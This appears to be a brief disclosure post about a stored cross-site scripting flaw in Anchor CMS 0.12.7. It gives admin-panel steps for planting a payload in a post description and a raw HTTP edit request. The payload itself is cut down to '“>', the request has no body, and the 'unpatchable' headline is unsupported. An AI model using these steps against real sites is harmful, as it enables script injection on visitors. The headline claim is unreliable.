New Unpatchable Vulnerability in Anchor CMS

Anchor CMS 0.12.7 – Persistent Cross-Site Scripting, this new cve discovered by Sinem Şahin risking about 2k of websites to be exploited


1- Go to the following url. => (HOST)/admin/
2- Login to admin panel.
3- Press “Posts” button.
4- Write XSS Payload into the description of the post.
5- Press “Save” button.
6- Go to the post.

XSS Payload ==> “>

==> HTTP Request <==

POST /admin/posts/edit/1 HTTP/1.1
Host: (HOST)
Content-Length: 262
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: /
Origin: (HOST)/
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: (HOST)/admin/posts/edit/1
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: anchorcms=21cdfqefqwefl69ij8231
Connection: close


Sources :